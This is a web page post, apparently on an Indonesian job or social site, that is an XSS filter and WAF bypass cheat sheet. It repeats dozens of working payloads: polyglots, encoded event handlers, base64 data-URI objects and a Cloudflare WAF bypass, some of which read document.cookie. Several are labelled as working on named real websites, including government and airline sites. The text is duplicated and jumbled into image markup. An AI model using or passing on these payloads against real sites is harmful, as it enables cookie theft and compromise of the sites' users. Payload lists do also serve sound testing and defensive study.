Login untuk melanjutkan
Email
Kata Sandi
Masuk
atau
Notifikasi
Komentar Post Ini
admin
20 September
(working on lib.ui, ppid.bps.go.id, garudaindonesia) Bypass filter using Double Encoding ( ">alert(1) case ) ”> XSS Bypass filter script tag removal [removed]alert(1)[removed] " onfocus=alert(1) "><" XSS Bypass filter using Event Handler " autofocus onfocus='alert(1)' Another XSS Bypass filter ">\x3csVg/\x3e '-alert(document/*xss*/.cookie)-' (working on blackbox.ai) %22%3E%3Cobject%20data=data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==%3E%3C/object%3E XSS Bypass WAF Cloudflare ">"> (working on bisnis.com) "> page="1">
1
0
Bagikan Post Ini
![XSS Bypass filter using polyglot
--><h2></div></div><script>alert(1)</script>
1"--></script><svg/onload=';alert(document.domain);'>
XSS Bypass filter using Character Encoding with octal escape sequence
encode
<iframe on only=1 onload="[]['\146\151\154\164\145\162']['\143\157\156\163\164\162\165\143\164\157\162']('\141\154\145\162\164\50\144\157\143\165\155\145\156\164\56\144\157\155\141\151\156\51')()">
decode:
<iframe on only=1 onload="[][ 'filter' ][ 'constructor' ]( 'alert(document.domain)' )()">
Bypass filter XSS with array
<noscript><p title="</noscript><img src=x onerror=([,O,B,J,E,C,,]=[]+{},[T,R,U,E,F,A,L,S,,,N]=[!!O]+!O+B.E)[X=C+O+N+S+T+R+U+C+T+O+R][X](A+L+E+R+T+(document.cookie))()>"> (working on lib.ui, ppid.bps.go.id, garudaindonesia)
Bypass filter using Double Encoding ( ">alert(1) case )
”><svg/onload=”%26%23x61;%26%23x6C;%26%23x65;%26%23x72;%26%23x74;(%26%23x64;%26%23x6F;%26%23x63;%26%23x75;%26%23x6D;%26%23x65;%26%23x6E;%26%23x74;.%26%23x64;%26%23x6F;%26%23x6D;%26%23x61;%26%23x69;%26%23x6E;)”>
XSS Bypass filter script tag removal [removed]alert(1)[removed]
" onfocus=alert(1) "><"
XSS Bypass filter using Event Handler
" autofocus onfocus='alert(1)'
Another XSS Bypass filter
">\x3csVg/<sVg/oNloAd=alert(1337)//>\x3e
'-alert(document/*xss*/.cookie)-'
<title><img title="</title><img src onerror=alert(1)>"></title>
<svg><animate onbegin=alert(1)></svg> (working on blackbox.ai)
<svg id="1"><script>alert(origin)</script></svg>
<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>
%22%3E%3Cobject%20data=data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==%3E%3C/object%3E
<details custom-attr= x open ontoggle="prompt()";
<meta http-equiv="refresh" content="0;url=javascript:alert(1)">
<object type="image/png" data="invalid.png" onload="alert(1)"></object>
XSS Bypass 404 Not Found
<svg on onload=(alert)(document.domain)> (working on PT tempo scan product website's)
XSS Bypass Access Denied using meta tag with base64 encoding
0;data:text/html;base64,PHNjcmlwdD5wcm9tcHQoIlJlZmxlY3RlZCBYU1MgQnkgUHJpYWwiKTwvc2NyaXB0Pg=="HTTP-EQUIV="refresh"
XSS Bypass filter using embed and svg with base64 encoding
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
XSS Bypass WAF Cloudflare
">"><Svg On Only=1 Onload=alert(1)> (working on bisnis.com)
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>
"><Body/oNpagEshoW=(prompt)(1)>
page="1"><Svg On Only=1 Onload=alert(1)>](/_next/image?url=https%3A%2F%2Fimage.kitakerja.co.id%2Fimages%2Fproduction%2FMelatiSesilia-826218468.jpg%3Fdpr%3D1%26fit%3Dcrop%26h%3D1000%26s%3Dbf2f3ca295ba74236f80e2cc326017e8%26w%3D1000&w=3840&q=75)
![XSS Bypass filter using polyglot
--><h2></div></div><script>alert(1)</script>
1"--></script><svg/onload=';alert(document.domain);'>
XSS Bypass filter using Character Encoding with octal escape sequence
encode
<iframe on only=1 onload="[]['\146\151\154\164\145\162']['\143\157\156\163\164\162\165\143\164\157\162']('\141\154\145\162\164\50\144\157\143\165\155\145\156\164\56\144\157\155\141\151\156\51')()">
decode:
<iframe on only=1 onload="[][ 'filter' ][ 'constructor' ]( 'alert(document.domain)' )()">
Bypass filter XSS with array
<noscript><p title="</noscript><img src=x onerror=([,O,B,J,E,C,,]=[]+{},[T,R,U,E,F,A,L,S,,,N]=[!!O]+!O+B.E)[X=C+O+N+S+T+R+U+C+T+O+R][X](A+L+E+R+T+(document.cookie))()>"> (working on lib.ui, ppid.bps.go.id, garudaindonesia)
Bypass filter using Double Encoding ( ">alert(1) case )
”><svg/onload=”%26%23x61;%26%23x6C;%26%23x65;%26%23x72;%26%23x74;(%26%23x64;%26%23x6F;%26%23x63;%26%23x75;%26%23x6D;%26%23x65;%26%23x6E;%26%23x74;.%26%23x64;%26%23x6F;%26%23x6D;%26%23x61;%26%23x69;%26%23x6E;)”>
XSS Bypass filter script tag removal [removed]alert(1)[removed]
" onfocus=alert(1) "><"
XSS Bypass filter using Event Handler
" autofocus onfocus='alert(1)'
Another XSS Bypass filter
">\x3csVg/<sVg/oNloAd=alert(1337)//>\x3e
'-alert(document/*xss*/.cookie)-'
<title><img title="</title><img src onerror=alert(1)>"></title>
<svg><animate onbegin=alert(1)></svg> (working on blackbox.ai)
<svg id="1"><script>alert(origin)</script></svg>
<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>
%22%3E%3Cobject%20data=data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==%3E%3C/object%3E
<details custom-attr= x open ontoggle="prompt()";
<meta http-equiv="refresh" content="0;url=javascript:alert(1)">
<object type="image/png" data="invalid.png" onload="alert(1)"></object>
XSS Bypass 404 Not Found
<svg on onload=(alert)(document.domain)> (working on PT tempo scan product website's)
XSS Bypass Access Denied using meta tag with base64 encoding
0;data:text/html;base64,PHNjcmlwdD5wcm9tcHQoIlJlZmxlY3RlZCBYU1MgQnkgUHJpYWwiKTwvc2NyaXB0Pg=="HTTP-EQUIV="refresh"
XSS Bypass filter using embed and svg with base64 encoding
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
XSS Bypass WAF Cloudflare
">"><Svg On Only=1 Onload=alert(1)> (working on bisnis.com)
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>
"><Body/oNpagEshoW=(prompt)(1)>
page="1"><Svg On Only=1 Onload=alert(1)>](/_next/image?url=https%3A%2F%2Fimage.kitakerja.co.id%2Fimages%2Fproduction%2FMelatiSesilia-742519515.jpg%3Fdpr%3D1%26fit%3Dcrop%26h%3D1000%26s%3D0f6021ecf8e1b35eae91a3d81e1e13d6%26w%3D1000&w=3840&q=75)